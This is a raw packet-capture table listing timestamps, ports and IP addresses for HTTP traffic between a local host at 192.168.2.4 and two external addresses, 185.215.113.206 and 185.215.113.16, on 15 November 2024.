Nov 15, 2024 14:09:28.845561028 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.845597029 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.845621109 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.845626116 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.845644951 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.845736027 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.846291065 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.846328020 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.846369982 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.846369982 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.887257099 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.893795013 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.169969082 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.170037031 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.170042992 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.170085907 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.170129061 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.170129061 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.170562983 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.170599937 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.170641899 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.170641899 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.171076059 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.171113968 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.171148062 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.171178102 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.171816111 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.171854973 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.171890974 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.171895981 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.171895981 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.171932936 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.172503948 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.172540903 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.172585964 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.172585964 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.173744917 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.173794985 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.173837900 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.173837900 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.173890114 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.174072027 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.174076080 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.174287081 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.174659967 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.174696922 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.174731016 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.174741983 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.174741983 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.174839020 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.175151110 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.175240993 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.175347090 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.175482988 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.176055908 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.176090956 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.176135063 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.176135063 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.176871061 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.177021980 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.177057981 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.177242041 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.177730083 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.177764893 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.177798986 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.177803993 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.177830935 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.177870035 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.178095102 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.178129911 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.178149939 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.178164005 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.178178072 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.178199053 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.178235054 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.178245068 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.178245068 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.178283930 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.178364992 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.178400040 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.178688049 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.178987026 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.179022074 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.179042101 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.179110050 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.179909945 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.179944992 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.179979086 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.179986954 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.179986954 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.180025101 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.180696011 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.180732965 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.180766106 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.180778027 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.180830002 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.181365013 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.181401014 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.181417942 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.181468964 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.182005882 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.182043076 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.182085991 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.182085991 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.182698011 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.182733059 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.182750940 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.182848930 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.183260918 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.183295965 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.183339119 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.183823109 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.183859110 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.183892965 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.183902979 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.183938980 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.183938980 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.184576988 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.184612036 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.184653997 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.184653997 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.185535908 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.185583115 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.185623884 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.185623884 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.186036110 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.186070919 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.186089039 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.186165094 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.186716080 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.186753035 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.186788082 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.186801910 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.186801910 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.186863899 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.187298059 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.187347889 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.187366009 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.187439919 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.188158989 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.188210964 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.188793898 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.188832045 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.188849926 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.188864946 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.188920975 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.188920975 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.658036947 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.658072948 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:29.671493053 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:29.672219992 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:30.449006081 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:30.449064016 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:30.862718105 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:30.868411064 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:31.148192883 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:31.148236036 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:31.148260117 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:31.148287058 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:31.148464918 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:31.148495913 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:31.148511887 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:31.148540974 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:31.156915903 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:31.164422989 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:31.448826075 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:31.448977947 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:31.459816933 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:31.483788967 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:32.296394110 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:32.296741962 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:32.320517063 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:32.344002008 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:32.622075081 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:32.622149944 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:32.625503063 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:32.631477118 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:32.631555080 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:32.631678104 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:32.637456894 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.601088047 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.601146936 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.601332903 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.601360083 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.601386070 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.601500988 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.601943970 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.601959944 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.601999998 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.602032900 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.604492903 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.604510069 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.604553938 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.604674101 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.605494976 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.605511904 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.605561972 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.605561972 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.608546972 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.608592033 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.617748022 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.617801905 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.747551918 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.747690916 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.747965097 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.747997999 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.748044014 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.748044014 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.749608040 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.749644041 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.749702930 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.749799967 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.751291990 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.751346111 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.751368046 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.751391888 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.753424883 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.753462076 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.753484011 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.753523111 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.755615950 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.755651951 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.755683899 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.755683899 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.755743027 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.755743027 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.757572889 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.757608891 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.757632971 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.757658958 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.759390116 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.759429932 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.759449959 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.759478092 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.761601925 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.761637926 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.761677027 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.761677027 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.763305902 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.763359070 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.763394117 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.763405085 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.763405085 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.763513088 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.765372038 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.765635967 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.765809059 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.765844107 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.765870094 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.765897036 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.929567099 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.929752111 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.930166960 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.930265903 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.930349112 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.930536985 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.931041956 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.931181908 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.931191921 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.931252003 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.931854963 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.931871891 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.931886911 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.931929111 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.931996107 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.932015896 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.932060003 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.932060003 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.932231903 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.932971954 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.932986975 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.933036089 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.933036089 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.935004950 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.935020924 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.935034037 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.935072899 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.935072899 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.937016964 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.937035084 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.937088966 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.937088966 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.939080000 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.939096928 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.939111948 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.939182043 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.939182043 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.940929890 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.940947056 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.940995932 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.943062067 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.943078041 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.943193913 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.944938898 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.944974899 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.945020914 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.945020914 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.956336021 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.956357002 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.956372023 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.956403971 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.956423998 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.957000971 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.957164049 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.957995892 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.958170891 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.958453894 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.958471060 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.958509922 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.958626032 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.960078955 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.960094929 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.960165024 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.961596012 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.961613894 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.961647987 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.961678982 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.963030100 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.963088036 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.964317083 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.964334965 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.964487076 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.966049910 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.966067076 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.966080904 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.966108084 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.966181993 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.968794107 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.968811035 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.968859911 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:33.971508026 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.971524000 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:33.971609116 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.059251070 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.059333086 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.059643030 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.059679031 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.059715986 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.059758902 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.061091900 CET	80	49761	185.215.113.16	192.168.2.4
